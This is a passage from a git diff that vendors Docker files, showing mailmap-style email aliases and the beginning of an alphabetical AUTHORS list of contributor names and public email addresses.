+Tristan Carel <tristan@cogniteev.com>
+<tristan@cogniteev.com> <tristan.carel@gmail.com>
+Vincent Demeester <vincent@sbr.pm>
+<vincent@sbr.pm> <vincent+github@demeester.fr>
+Vishnu Kannan <vishnuk@google.com>
+xlgao-zju <xlgao@zju.edu.cn> xlgao <xlgao@zju.edu.cn>
+yuchangchun <yuchangchun1@huawei.com> y00277921 <yuchangchun1@huawei.com> 
+<zij@case.edu> <zjaffee@us.ibm.com>
+<anujbahuguna.dev@gmail.com> <abahuguna@fiberlink.com>
+<eungjun.yi@navercorp.com> <semtlenori@gmail.com>
+<haosw@cn.ibm.com> <haoshuwei1989@163.com>
+Hao Shu Wei <haosw@cn.ibm.com>
+<matt.bentley@docker.com> <mbentley@mbentley.net>
+<MihaiBorob@gmail.com> <MihaiBorobocea@gmail.com>
+<redmond.martin@gmail.com> <xgithub@redmond5.com>
+<redmond.martin@gmail.com> <martin@tinychat.com>
+<srbrahma@us.ibm.com> <sbrahma@us.ibm.com>
+<suda.akihiro@lab.ntt.co.jp> <suda.kyoto@gmail.com>
+<thomas@gazagnaire.org> <thomas@gazagnaire.com>
+Shengbo Song <thomassong@tencent.com> mYmNeo <mymneo@163.com>
+Shengbo Song <thomassong@tencent.com>
+<sylvain@ascribe.io> <sylvain.bellemare@ezeep.com>
+Sylvain Bellemare <sylvain@ascribe.io>
+<alexandre.beslic@gmail.com> <abronan@docker.com>
+<bilal.amarni@gmail.com> <bamarni@users.noreply.github.com>
+<misty@docker.com> <misty@apache.org>
+Arnaud Porterie <arnaud.porterie@docker.com>
+<cpuguy83@gmail.com> <bgoff@cpuguy83-mbp.local>
+David M. Karr <davidmichaelkarr@gmail.com>
+<diogo@docker.com> <diogo.monica@gmail.com>
+<horwitz@addthis.com> <horwitzja@gmail.com>
+<kherner@progress.com> <chosenken@gmail.com>
+Kenfe-Mickaël Laventure <mickael.laventure@gmail.com>
+<mauricio@medallia.com> <mauriciogaravaglia@gmail.com>
+<dhenderson@gmail.com> <Dave.Henderson@ca.ibm.com>
+<wkq5325@gmail.com> <wkqwu@cn.ibm.com>
+<mike.goelzer@docker.com> <mgoelzer@docker.com>
+<nicholasjamesrusso@gmail.com> <nicholasrusso@icloud.com>
+Runshen Zhu <runshen.zhu@gmail.com>
+Tom Barlow <tomwbarlow@gmail.com>
+Xianlu Bird <xianlubird@gmail.com>
+Dan Feldman <danf@jfrog.com>
+Harry Zhang <harryz@hyper.sh> <harryzhang@zju.edu.cn>
diff --git a/vendor/github.com/docker/docker/AUTHORS b/vendor/github.com/docker/docker/AUTHORS
new file mode 100644
index 0000000000..246e2a33f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/AUTHORS
@@ -0,0 +1,1652 @@
+# This file lists all individuals having contributed content to the repository.
+# For how it is generated, see `hack/generate-authors.sh`.
+
+Aanand Prasad <aanand.prasad@gmail.com>
+Aaron Davidson <aaron@databricks.com>
+Aaron Feng <aaron.feng@gmail.com>
+Aaron Huslage <huslage@gmail.com>
+Aaron Lehmann <aaron.lehmann@docker.com>
+Aaron Welch <welch@packet.net>
+Abel Muiño <amuino@gmail.com>
+Abhijeet Kasurde <akasurde@redhat.com>
+Abhinav Ajgaonkar <abhinav316@gmail.com>
+Abhishek Chanda <abhishek.becs@gmail.com>
+Abin Shahab <ashahab@altiscale.com>
+Adam Avilla <aavilla@yp.com>
+Adam Kunk <adam.kunk@tiaa-cref.org>
+Adam Miller <admiller@redhat.com>
+Adam Mills <adam@armills.info>
+Adam Singer <financeCoding@gmail.com>
+Adam Walz <adam@adamwalz.net>
+Aditi Rajagopal <arajagopal@us.ibm.com>
+Aditya <aditya@netroy.in>
+Adolfo Ochagavía <aochagavia92@gmail.com>
+Adria Casas <adriacasas88@gmail.com>
+Adrian Moisey <adrian@changeover.za.net>
+Adrian Mouat <adrian.mouat@gmail.com>
+Adrian Oprea <adrian@codesi.nz>
+Adrien Folie <folie.adrien@gmail.com>
+Adrien Gallouët <adrien@gallouet.fr>
+Ahmed Kamal <email.ahmedkamal@googlemail.com>
+Ahmet Alp Balkan <ahmetb@microsoft.com>
+Aidan Feldman <aidan.feldman@gmail.com>
+Aidan Hobson Sayers <aidanhs@cantab.net>
+AJ Bowen <aj@gandi.net>
+Ajey Charantimath <ajey.charantimath@gmail.com>
+ajneu <ajneu@users.noreply.github.com>
+Akihiro Suda <suda.akihiro@lab.ntt.co.jp>
+Al Tobey <al@ooyala.com>
+alambike <alambike@gmail.com>
+Alan Scherger <flyinprogrammer@gmail.com>
+Alan Thompson <cloojure@gmail.com>
+Albert Callarisa <shark234@gmail.com>
+Albert Zhang <zhgwenming@gmail.com>
+Aleksa Sarai <asarai@suse.de>
+Aleksandrs Fadins <aleks@s-ko.net>
+Alena Prokharchyk <alena@rancher.com>
+Alessandro Boch <aboch@docker.com>
+Alessio Biancalana <dottorblaster@gmail.com>
+Alex Chan <alex@alexwlchan.net>
+Alex Coventry <alx@empirical.com>
+Alex Crawford <alex.crawford@coreos.com>
+Alex Ellis <alexellis2@gmail.com>
+Alex Gaynor <alex.gaynor@gmail.com>
+Alex Olshansky <i@creagenics.com>
+Alex Samorukov <samm@os2.kiev.ua>
+Alex Warhawk <ax.warhawk@gmail.com>
+Alexander Artemenko <svetlyak.40wt@gmail.com>
+Alexander Boyd <alex@opengroove.org>
+Alexander Larsson <alexl@redhat.com>
+Alexander Morozov <lk4d4@docker.com>
+Alexander Shopov <ash@kambanaria.org>
+Alexandre Beslic <alexandre.beslic@gmail.com>
+Alexandre González <agonzalezro@gmail.com>
+Alexandru Sfirlogea <alexandru.sfirlogea@gmail.com>
+Alexey Guskov <lexag@mail.ru>
+Alexey Kotlyarov <alexey@infoxchange.net.au>
+Alexey Shamrin <shamrin@gmail.com>
+Alexis THOMAS <fr.alexisthomas@gmail.com>
+Ali Dehghani <ali.dehghani.g@gmail.com>
+Allen Madsen <blatyo@gmail.com>
+Allen Sun <allen.sun@daocloud.io>
+almoehi <almoehi@users.noreply.github.com>
+Alvaro Saurin <alvaro.saurin@gmail.com>
+Alvin Richards <alvin.richards@docker.com>
+amangoel <amangoel@gmail.com>
+Amen Belayneh <amenbelayneh@gmail.com>
+Amit Bakshi <ambakshi@gmail.com>
+Amit Krishnan <amit.krishnan@oracle.com>
+Amit Shukla <amit.shukla@docker.com>
+Amy Lindburg <amy.lindburg@docker.com>
+Anand Patil <anand.prabhakar.patil@gmail.com>
+AnandkumarPatel <anandkumarpatel@gmail.com>
+Anatoly Borodin <anatoly.borodin@gmail.com>
+Anchal Agrawal <aagrawa4@illinois.edu>
+Anders Janmyr <anders@janmyr.com>
+Andre Dublin <81dublin@gmail.com>
+Andre Granovsky <robotciti@live.com>
+Andrea Luzzardi <aluzzardi@gmail.com>
+Andrea Turli <andrea.turli@gmail.com>
+Andreas Köhler <andi5.py@gmx.net>
+Andreas Savvides <andreas@editd.com>
+Andreas Tiefenthaler <at@an-ti.eu>
+Andrei Gherzan <andrei@resin.io>
+Andrew C. Bodine <acbodine@us.ibm.com>
+Andrew Clay Shafer <andrewcshafer@gmail.com>
+Andrew Duckworth <grillopress@gmail.com>
+Andrew France <andrew@avito.co.uk>
+Andrew Gerrand <adg@golang.org>
+Andrew Guenther <guenther.andrew.j@gmail.com>
+Andrew Kuklewicz <kookster@gmail.com>
+Andrew Macgregor <andrew.macgregor@agworld.com.au>
+Andrew Macpherson <hopscotch23@gmail.com>
+Andrew Martin <sublimino@gmail.com>
+Andrew Munsell <andrew@wizardapps.net>
+Andrew Po <absourd.noise@gmail.com>
+Andrew Weiss <andrew.weiss@outlook.com>
+Andrew Williams <williams.andrew@gmail.com>
+Andrews Medina <andrewsmedina@gmail.com>
+Andrey Petrov <andrey.petrov@shazow.net>
+Andrey Stolbovsky <andrey.stolbovsky@gmail.com>
+André Martins <aanm90@gmail.com>
+andy <ztao@tibco-support.com>
+Andy Chambers <anchambers@paypal.com>
+andy diller <dillera@gmail.com>
+Andy Goldstein <agoldste@redhat.com>
+Andy Kipp <andy@rstudio.com>
+Andy Rothfusz <github@developersupport.net>
+Andy Smith <github@anarkystic.com>
+Andy Wilson <wilson.andrew.j+github@gmail.com>
+Anes Hasicic <anes.hasicic@gmail.com>
+Anil Belur <askb23@gmail.com>
+Anil Madhavapeddy <anil@recoil.org>
+Ankush Agarwal <ankushagarwal11@gmail.com>
+Anonmily <michelle@michelleliu.io>
+Anthon van der Neut <anthon@mnt.org>
+Anthony Baire <Anthony.Baire@irisa.fr>
+Anthony Bishopric <git@anthonybishopric.com>
+Anthony Dahanne <anthony.dahanne@gmail.com>
+Anton Löfgren <anton.lofgren@gmail.com>
+Anton Nikitin <anton.k.nikitin@gmail.com>
+Anton Polonskiy <anton.polonskiy@gmail.com>
+Anton Tiurin <noxiouz@yandex.ru>
+Antonio Murdaca <antonio.murdaca@gmail.com>
+Antonis Kalipetis <akalipetis@gmail.com>
+Antony Messerli <amesserl@rackspace.com>
+Anuj Bahuguna <anujbahuguna.dev@gmail.com>
+Anusha Ragunathan <anusha.ragunathan@docker.com>
+apocas <petermdias@gmail.com>
+ArikaChen <eaglesora@gmail.com>
+Arnaud Lefebvre <a.lefebvre@outlook.fr>
+Arnaud Porterie <arnaud.porterie@docker.com>
+Arthur Barr <arthur.barr@uk.ibm.com>
+Arthur Gautier <baloo@gandi.net>
+Artur Meyster <arthurfbi@yahoo.com>
+Arun Gupta <arun.gupta@gmail.com>
+Asbjørn Enge <asbjorn@hanafjedle.net>
+averagehuman <averagehuman@users.noreply.github.com>
+Avi Das <andas222@gmail.com>
+Avi Miller <avi.miller@oracle.com>
+Avi Vaid <avaid1996@gmail.com>
+ayoshitake <airandfingers@gmail.com>
+Azat Khuyiyakhmetov <shadow_uz@mail.ru>
+Bardia Keyoumarsi <bkeyouma@ucsc.edu>
+Barnaby Gray <barnaby@pickle.me.uk>
+Barry Allard <barry.allard@gmail.com>
+Bartłomiej Piotrowski <b@bpiotrowski.pl>
+Bastiaan Bakker <bbakker@xebia.com>
+bdevloed <boris.de.vloed@gmail.com>
+Ben Firshman <ben@firshman.co.uk>
+Ben Golub <ben.golub@dotcloud.com>
+Ben Hall <ben@benhall.me.uk>
+Ben Sargent <ben@brokendigits.com>
+Ben Severson <BenSeverson@users.noreply.github.com>
+Ben Toews <mastahyeti@gmail.com>
+Ben Wiklund <ben@daisyowl.com>
+Benjamin Atkin <ben@benatkin.com>
+Benoit Chesneau <bchesneau@gmail.com>
+Bernerd Schaefer <bj.schaefer@gmail.com>
+Bert Goethals <bert@bertg.be>
+Bharath Thiruveedula <bharath_ves@hotmail.com>
+Bhiraj Butala <abhiraj.butala@gmail.com>
+Bilal Amarni <bilal.amarni@gmail.com>
+Bill W <SydOps@users.noreply.github.com>
+bin liu <liubin0329@users.noreply.github.com>
+Blake Geno <blakegeno@gmail.com>
+Boaz Shuster <ripcurld.github@gmail.com>
+bobby abbott <ttobbaybbob@gmail.com>
+boucher <rboucher@gmail.com>
+Bouke Haarsma <bouke@webatoom.nl>
+Boyd Hemphill <boyd@feedmagnet.com>
+boynux <boynux@gmail.com>
+Bradley Cicenas <bradley.cicenas@gmail.com>
+Bradley Wright <brad@intranation.com>
+Brandon Liu <bdon@bdon.org>
+Brandon Philips <brandon@ifup.org>
+Brandon Rhodes <brandon@rhodesmill.org>
+Brendan Dixon <brendand@microsoft.com>
+Brent Salisbury <brent.salisbury@docker.com>
+Brett Higgins <brhiggins@arbor.net>
+Brett Kochendorfer <brett.kochendorfer@gmail.com>
+Brian (bex) Exelbierd <bexelbie@redhat.com>
+Brian Bland <brian.bland@docker.com>
+Brian DeHamer <brian@dehamer.com>
+Brian Dorsey <brian@dorseys.org>
+Brian Flad <bflad417@gmail.com>
+Brian Goff <cpuguy83@gmail.com>
+Brian McCallister <brianm@skife.org>
+Brian Olsen <brian@maven-group.org>
+Brian Shumate <brian@couchbase.com>
+Brian Torres-Gil <brian@dralth.com>
+Brian Trump <btrump@yelp.com>
+Brice Jaglin <bjaglin@teads.tv>
+Briehan Lombaard <briehan.lombaard@gmail.com>
+Bruno Bigras <bigras.bruno@gmail.com>
+Bruno Binet <bruno.binet@gmail.com>
+Bruno Gazzera <bgazzera@paginar.com>
+Bruno Renié <brutasse@gmail.com>
+Bryan Bess <squarejaw@bsbess.com>
+Bryan Boreham <bjboreham@gmail.com>
+Bryan Matsuo <bryan.matsuo@gmail.com>
+Bryan Murphy <bmurphy1976@gmail.com>
+buddhamagnet <buddhamagnet@gmail.com>
+Burke Libbey <burke@libbey.me>
+Byung Kang <byung.kang.ctr@amrdec.army.mil>
+Caleb Spare <cespare@gmail.com>
+Calen Pennington <cale@edx.org>
+Cameron Boehmer <cameron.boehmer@gmail.com>
+Cameron Spear <cameronspear@gmail.com>
+Campbell Allen <campbell.allen@gmail.com>
+Candid Dauth <cdauth@cdauth.eu>
+Cao Weiwei <cao.weiwei30@zte.com.cn>
+Carl Henrik Lunde <chlunde@ping.uio.no>
+Carl Loa Odin <carlodin@gmail.com>
+Carl X. Su <bcbcarl@gmail.com>
+Carlos Alexandro Becker <caarlos0@gmail.com>
+Carlos Sanchez <carlos@apache.org>
+Carol Fager-Higgins <carol.fager-higgins@docker.com>
+Cary <caryhartline@users.noreply.github.com>
+Casey Bisson <casey.bisson@joyent.com>
+Cedric Davies <cedricda@microsoft.com>
+Cezar Sa Espinola <cezarsa@gmail.com>
+Chad Swenson <chadswen@gmail.com>
+Chance Zibolski <chance.zibolski@gmail.com>
+Chander G <chandergovind@gmail.com>
+Charles Chan <charleswhchan@users.noreply.github.com>
+Charles Hooper <charles.hooper@dotcloud.com>
+Charles Law <claw@conduce.com>
+Charles Lindsay <chaz@chazomatic.us>
+Charles Merriam <charles.merriam@gmail.com>
+Charles Sarrazin <charles@sarraz.in>
+Charles Smith <charles.smith@docker.com>
+Charlie Lewis <charliel@lab41.org>
+Chase Bolt <chase.bolt@gmail.com>
+ChaYoung You <yousbe@gmail.com>
+Chen Chao <cc272309126@gmail.com>
+Chen Hanxiao <chenhanxiao@cn.fujitsu.com>
+cheney90 <cheney-90@hotmail.com>
+Chewey <prosto-chewey@users.noreply.github.com>
+Chia-liang Kao <clkao@clkao.org>
+chli <chli@freewheel.tv>
+Cholerae Hu <choleraehyq@gmail.com>
+Chris Alfonso <calfonso@redhat.com>
+Chris Armstrong <chris@opdemand.com>
+Chris Dituri <csdituri@gmail.com>
+Chris Fordham <chris@fordham-nagy.id.au>
+Chris Khoo <chris.khoo@gmail.com>
+Chris McKinnel <chrismckinnel@gmail.com>
+Chris Seto <chriskseto@gmail.com>
+Chris Snow <chsnow123@gmail.com>
+Chris St. Pierre <chris.a.st.pierre@gmail.com>
+Chris Stivers <chris@stivers.us>
+Chris Swan <chris.swan@iee.org>
+Chris Wahl <github@wahlnetwork.com>
+Chris Weyl <cweyl@alumni.drew.edu>
+chrismckinnel <chris.mckinnel@tangentlabs.co.uk>
+Christian Berendt <berendt@b1-systems.de>
+Christian Böhme <developement@boehme3d.de>
+Christian Persson <saser@live.se>
+Christian Rotzoll <ch.rotzoll@gmail.com>
+Christian Simon <simon@swine.de>
+Christian Stefanescu <st.chris@gmail.com>
+ChristoperBiscardi <biscarch@sketcht.com>
+Christophe Mehay <cmehay@online.net>
+Christophe Troestler <christophe.Troestler@umons.ac.be>
+Christopher Currie <codemonkey+github@gmail.com>
+Christopher Jones <tophj@linux.vnet.ibm.com>
+Christopher Latham <sudosurootdev@gmail.com>
+Christopher Rigor <crigor@gmail.com>
+Christy Perez <christy@linux.vnet.ibm.com>
+Chun Chen <ramichen@tencent.com>
+Ciro S. Costa <ciro.costa@usp.br>
+Clayton Coleman <ccoleman@redhat.com>
+Clinton Kitson <clintonskitson@gmail.com>
+Coenraad Loubser <coenraad@wish.org.za>
+Colin Dunklau <colin.dunklau@gmail.com>
+Colin Rice <colin@daedrum.net>
+Colin Walters <walters@verbum.org>
+Collin Guarino <collin.guarino@gmail.com>
+Colm Hally <colmhally@gmail.com>
+companycy <companycy@gmail.com>
+Cory Forsyth <cory.forsyth@gmail.com>
+cressie176 <github@stephen-cresswell.net>
+CrimsonGlory <CrimsonGlory@users.noreply.github.com>
+Cristian Staretu <cristian.staretu@gmail.com>
+cristiano balducci <cristiano.balducci@gmail.com>
+Cruceru Calin-Cristian <crucerucalincristian@gmail.com>
+Cyril F <cyrilf7x@gmail.com>
+Daan van Berkel <daan.v.berkel.1980@gmail.com>
+Daehyeok Mun <daehyeok@gmail.com>
+Dafydd Crosby <dtcrsby@gmail.com>
+dalanlan <dalanlan925@gmail.com>
+Damian Smyth <damian@dsau.co>
+Damien Nadé <github@livna.org>
+Damien Nozay <damien.nozay@gmail.com>
+Damjan Georgievski <gdamjan@gmail.com>
+Dan Anolik <dan@anolik.net>
+Dan Buch <d.buch@modcloth.com>
+Dan Cotora <dan@bluevision.ro>
+Dan Feldman <danf@jfrog.com>
+Dan Griffin <dgriffin@peer1.com>
+Dan Hirsch <thequux@upstandinghackers.com>
+Dan Keder <dan.keder@gmail.com>
+Dan Levy <dan@danlevy.net>
+Dan McPherson <dmcphers@redhat.com>
+Dan Stine <sw@stinemail.com>
+Dan Walsh <dwalsh@redhat.com>
+Dan Williams <me@deedubs.com>
+Daniel Antlinger <d.antlinger@gmx.at>
+Daniel Exner <dex@dragonslave.de>
+Daniel Farrell <dfarrell@redhat.com>
+Daniel Garcia <daniel@danielgarcia.info>
+Daniel Gasienica <daniel@gasienica.ch>
+Daniel Hiltgen <daniel.hiltgen@docker.com>
+Daniel Menet <membership@sontags.ch>
+Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com>
+Daniel Nephin <dnephin@docker.com>
+Daniel Norberg <dano@spotify.com>
+Daniel Nordberg <dnordberg@gmail.com>
+Daniel Robinson <gottagetmac@gmail.com>
+Daniel S <dan.streby@gmail.com>
+Daniel Von Fange <daniel@leancoder.com>
+Daniel X Moore <yahivin@gmail.com>
+Daniel YC Lin <dlin.tw@gmail.com>
+Daniel Zhang <jmzwcn@gmail.com>
+Daniel, Dao Quang Minh <dqminh@cloudflare.com>
+Danny Berger <dpb587@gmail.com>
+Danny Yates <danny@codeaholics.org>
+Darren Coxall <darren@darrencoxall.com>
+Darren Shepherd <darren.s.shepherd@gmail.com>
+Darren Stahl <darst@microsoft.com>
+Davanum Srinivas <davanum@gmail.com>
+Dave Barboza <dbarboza@datto.com>
+Dave Henderson <dhenderson@gmail.com>
+Dave MacDonald <mindlapse@gmail.com>
+Dave Tucker <dt@docker.com>
+David Anderson <dave@natulte.net>
+David Calavera <david.calavera@gmail.com>
+David Corking <dmc-source@dcorking.com>
+David Cramer <davcrame@cisco.com>
+David Currie <david_currie@uk.ibm.com>
+David Davis <daviddavis@redhat.com>
+David Dooling <dooling@gmail.com>
+David Gageot <david@gageot.net>
+David Gebler <davidgebler@gmail.com>
+David Lawrence <david.lawrence@docker.com>
+David Lechner <david@lechnology.com>
+David M. Karr <davidmichaelkarr@gmail.com>
+David Mackey <tdmackey@booleanhaiku.com>
+David Mat <david@davidmat.com>
+David Mcanulty <github@hellspark.com>
+David Pelaez <pelaez89@gmail.com>
+David R. Jenni <david.r.jenni@gmail.com>
+David Röthlisberger <david@rothlis.net>
+David Sheets <sheets@alum.mit.edu>
+David Sissitka <me@dsissitka.com>
+David Trott <github@davidtrott.com>
+David Xia <dxia@spotify.com>
+David Young <yangboh@cn.ibm.com>
+Davide Ceretti <davide.ceretti@hogarthww.com>
+Dawn Chen <dawnchen@google.com>
+dbdd <wangtong2712@gmail.com>
+dcylabs <dcylabs@gmail.com>
+decadent <decadent@users.noreply.github.com>
+deed02392 <georgehafiz@gmail.com>
+Deng Guangxing <dengguangxing@huawei.com>
+Deni Bertovic <deni@kset.org>
+Denis Gladkikh <denis@gladkikh.email>
+Denis Ollier <larchunix@users.noreply.github.com>
+Dennis Docter <dennis@d23.nl>
+Derek <crq@kernel.org>
+Derek <crquan@gmail.com>
+Derek Ch <denc716@gmail.com>
+Derek McGowan <derek@mcgstyle.net>
+Deric Crago <deric.crago@gmail.com>
+Deshi Xiao <dxiao@redhat.com>
+devmeyster <arthurfbi@yahoo.com>
+Devvyn Murphy <devvyn@devvyn.com>
+Dharmit Shah <shahdharmit@gmail.com>
+Dieter Reuter <dieter.reuter@me.com>
+Dillon Dixon <dillondixon@gmail.com>
+Dima Stopel <dima@twistlock.com>
+Dimitri John Ledkov <dimitri.j.ledkov@intel.com>
+Dimitris Rozakis <dimrozakis@gmail.com>
+Dimitry Andric <d.andric@activevideo.com>
+Dinesh Subhraveti <dineshs@altiscale.com>
+Diogo Monica <diogo@docker.com>
+DiuDiugirl <sophia.wang@pku.edu.cn>
+Djibril Koné <kone.djibril@gmail.com>
+dkumor <daniel@dkumor.com>
+Dmitri Logvinenko <dmitri.logvinenko@gmail.com>
+Dmitri Shuralyov <shurcooL@gmail.com>
+Dmitry Demeshchuk <demeshchuk@gmail.com>
+Dmitry Gusev <dmitry.gusev@gmail.com>
+Dmitry Smirnov <onlyjob@member.fsf.org>
+Dmitry V. Krivenok <krivenok.dmitry@gmail.com>
+Dmitry Vorobev <dimahabr@gmail.com>
+Dolph Mathews <dolph.mathews@gmail.com>
+Dominik Finkbeiner <finkes93@gmail.com>
+Dominik Honnef <dominik@honnef.co>
+Don Kirkby <donkirkby@users.noreply.github.com>
+Don Kjer <don.kjer@gmail.com>
+Don Spaulding <donspauldingii@gmail.com>
+Donald Huang <don.hcd@gmail.com>
+Dong Chen <dongluo.chen@docker.com>
+Donovan Jones <git@gamma.net.nz>
+Doron Podoleanu <doronp@il.ibm.com>
+Doug Davis <dug@us.ibm.com>
+Doug MacEachern <dougm@vmware.com>
+Doug Tangren <d.tangren@gmail.com>
+Dr Nic Williams <drnicwilliams@gmail.com>
+dragon788 <dragon788@users.noreply.github.com>
+Dražen Lučanin <kermit666@gmail.com>
+Drew Erny <drew.erny@docker.com>
+Dustin Sallings <dustin@spy.net>
+Ed Costello <epc@epcostello.com>
+Edmund Wagner <edmund-wagner@web.de>
+Eiichi Tsukata <devel@etsukata.com>
+Eike Herzbach <eike@herzbach.net>
+Eivin Giske Skaaren <eivinsn@axis.com>
+Eivind Uggedal <eivind@uggedal.com>
+Elan Ruusamäe <glen@delfi.ee>
+Elias Probst <mail@eliasprobst.eu>
+Elijah Zupancic <elijah@zupancic.name>
+eluck <mail@eluck.me>
+Elvir Kuric <elvirkuric@gmail.com>
+Emil Hernvall <emil@quench.at>
+Emily Maier <emily@emilymaier.net>
+Emily Rose <emily@contactvibe.com>
+Emir Ozer <emirozer@yandex.com>
+Enguerran <engcolson@gmail.com>
+Eohyung Lee <liquidnuker@gmail.com>
+Eric Barch <barch@tomesoftware.com>
+Eric Hanchrow <ehanchrow@ine.com>
+Eric Lee <thenorthsecedes@gmail.com>
+Eric Myhre <hash@exultant.us>
+Eric Paris <eparis@redhat.com>
+Eric Rafaloff <erafaloff@gmail.com>
+Eric Rosenberg <ehaydenr@users.noreply.github.com>
+Eric Sage <eric.david.sage@gmail.com>
+Eric Windisch <eric@windisch.us>
+Eric Yang <windfarer@gmail.com>
+Eric-Olivier Lamey <eo@lamey.me>
+Erik Bray <erik.m.bray@gmail.com>
+Erik Dubbelboer <erik@dubbelboer.com>
+Erik Hollensbe <github@hollensbe.org>
+Erik Inge Bolsø <knan@redpill-linpro.com>
+Erik Kristensen <erik@erikkristensen.com>
+Erik Weathers <erikdw@gmail.com>
+Erno Hopearuoho <erno.hopearuoho@gmail.com>
+Erwin van der Koogh <info@erronis.nl>
+Euan <euank@amazon.com>
+Eugene Yakubovich <eugene.yakubovich@coreos.com>
+eugenkrizo <eugen.krizo@gmail.com>
+evalle <shmarnev@gmail.com>
+Evan Allrich <evan@unguku.com>
+Evan Carmi <carmi@users.noreply.github.com>
+Evan Hazlett <ejhazlett@gmail.com>
+Evan Krall <krall@yelp.com>
+Evan Phoenix <evan@fallingsnow.net>
+Evan Wies <evan@neomantra.net>
+Everett Toews <everett.toews@rackspace.com>
+Evgeny Vereshchagin <evvers@ya.ru>
+Ewa Czechowska <ewa@ai-traders.com>
+Eystein Måløy Stenberg <eystein.maloy.stenberg@cfengine.com>
+ezbercih <cem.ezberci@gmail.com>
+Fabiano Rosas <farosas@br.ibm.com>
+Fabio Falci <fabiofalci@gmail.com>
+Fabio Rapposelli <fabio@vmware.com>
+Fabio Rehm <fgrehm@gmail.com>
+Fabrizio Regini <freegenie@gmail.com>
+Fabrizio Soppelsa <fsoppelsa@mirantis.com>
+Faiz Khan <faizkhan00@gmail.com>
+falmp <chico.lopes@gmail.com>
+Fangyuan Gao <21551127@zju.edu.cn>
+Fareed Dudhia <fareeddudhia@googlemail.com>
+Fathi Boudra <fathi.boudra@linaro.org>
+Federico Gimenez <fgimenez@coit.es>
+Felix Geisendörfer <felix@debuggable.com>
+Felix Hupfeld <quofelix@users.noreply.github.com>
+Felix Rabe <felix@rabe.io>
+Felix Ruess <felix.ruess@roboception.de>
+Felix Schindler <fschindler@weluse.de>
+Ferenc Szabo <pragmaticfrank@gmail.com>
+Fernando <fermayo@gmail.com>
+Fero Volar <alian@alian.info>
+Ferran Rodenas <frodenas@gmail.com>
+Filipe Brandenburger <filbranden@google.com>
+Filipe Oliveira <contato@fmoliveira.com.br>
+fl0yd <fl0yd@me.com>
+Flavio Castelli <fcastelli@suse.com>
+FLGMwt <ryan.stelly@live.com>
+Florian <FWirtz@users.noreply.github.com>
+Florian Klein <florian.klein@free.fr>
+Florian Maier <marsmensch@users.noreply.github.com>
+Florian Weingarten <flo@hackvalue.de>
+Florin Asavoaie <florin.asavoaie@gmail.com>
+fonglh <fonglh@gmail.com>
+fortinux <fortinux@users.noreply.github.com>
+Francesc Campoy <campoy@google.com>
+Francis Chuang <francis.chuang@boostport.com>
+Francisco Carriedo <fcarriedo@gmail.com>
+Francisco Souza <f@souza.cc>
+Frank Groeneveld <frank@ivaldi.nl>
+Frank Herrmann <fgh@4gh.tv>
+Frank Macreery <frank@macreery.com>
+Frank Rosquin <frank.rosquin+github@gmail.com>
+Fred Lifton <fred.lifton@docker.com>
+Frederick F. Kautz IV <fkautz@redhat.com>
+Frederik Loeffert <frederik@zitrusmedia.de>
+Frederik Nordahl Jul Sabroe <frederikns@gmail.com>
+Freek Kalter <freek@kalteronline.org>
+frosforever <frosforever@users.noreply.github.com>
+fy2462 <fy2462@gmail.com>
+Félix Baylac-Jacqué <baylac.felix@gmail.com>
+Félix Cantournet <felix.cantournet@cloudwatt.com>
+Gabe Rosenhouse <gabe@missionst.com>
+Gabor Nagy <mail@aigeruth.hu>
+Gabriel Monroy <gabriel@opdemand.com>
+GabrielNicolasAvellaneda <avellaneda.gabriel@gmail.com>
+Galen Sampson <galen.sampson@gmail.com>
+Gareth Rushgrove <gareth@morethanseven.net>
+Garrett Barboza <garrett@garrettbarboza.com>
+Gaurav <gaurav.gosec@gmail.com>
+gautam, prasanna <prasannagautam@gmail.com>
+GennadySpb <lipenkov@gmail.com>
+Geoffrey Bachelet <grosfrais@gmail.com>
+George MacRorie <gmacr31@gmail.com>
+George Xie <georgexsh@gmail.com>
+Georgi Hristozov <georgi@forkbomb.nl>
+Gereon Frey <gereon.frey@dynport.de>
+German DZ <germ@ndz.com.ar>
+Gert van Valkenhoef <g.h.m.van.valkenhoef@rug.nl>
+Gianluca Borello <g.borello@gmail.com>
+Gildas Cuisinier <gildas.cuisinier@gcuisinier.net>
+gissehel <public-devgit-dantus@gissehel.org>
+Giuseppe Mazzotta <gdm85@users.noreply.github.com>
+Gleb Fotengauer-Malinovskiy <glebfm@altlinux.org>
+Gleb M Borisov <borisov.gleb@gmail.com>
+Glyn Normington <gnormington@gopivotal.com>
+GoBella <caili_welcome@163.com>
+Goffert van Gool <goffert@phusion.nl>
+Gosuke Miyashita <gosukenator@gmail.com>
+Gou Rao <gourao@users.noreply.github.com>
+Govinda Fichtner <govinda.fichtner@googlemail.com>
+Grant Reaber <grant.reaber@gmail.com>
+Graydon Hoare <graydon@pobox.com>
+Greg Fausak <greg@tacodata.com>
+Greg Thornton <xdissent@me.com>
+grossws <grossws@gmail.com>
+grunny <mwgrunny@gmail.com>
+gs11 <gustav.sinder@gmail.com>
+Guilhem Lettron <guilhem+github@lettron.fr>
+Guilherme Salgado <gsalgado@gmail.com>
+Guillaume Dufour <gdufour.prestataire@voyages-sncf.com>
+Guillaume J. Charmes <guillaume.charmes@docker.com>
+guoxiuyan <guoxiuyan@huawei.com>
+Gurjeet Singh <gurjeet@singh.im>
+Guruprasad <lgp171188@gmail.com>
+gwx296173 <gaojing3@huawei.com>
+Günter Zöchbauer <guenter@gzoechbauer.com>
+Hans Kristian Flaatten <hans@starefossen.com>
+Hans Rødtang <hansrodtang@gmail.com>
+Hao Shu Wei <haosw@cn.ibm.com>
+Hao Zhang <21521210@zju.edu.cn>
+Harald Albers <github@albersweb.de>
+Harley Laue <losinggeneration@gmail.com>
+Harold Cooper <hrldcpr@gmail.com>
+Harry Zhang <harryz@hyper.sh>
+He Simei <hesimei@zju.edu.cn>
+heartlock <21521209@zju.edu.cn>
+Hector Castro <hectcastro@gmail.com>
+Henning Sprang <henning.sprang@gmail.com>
+Hobofan <goisser94@gmail.com>
+Hollie Teal <hollie@docker.com>
+Hong Xu <hong@topbug.net>
+hsinko <21551195@zju.edu.cn>
+Hu Keping <hukeping@huawei.com>
+Hu Tao <hutao@cn.fujitsu.com>
+Huanzhong Zhang <zhanghuanzhong90@gmail.com>
+Huayi Zhang <irachex@gmail.com>
+Hugo Duncan <hugo@hugoduncan.org>
+Hugo Marisco <0x6875676f@gmail.com>
+Hunter Blanks <hunter@twilio.com>
+huqun <huqun@zju.edu.cn>
+Huu Nguyen <huu@prismskylabs.com>
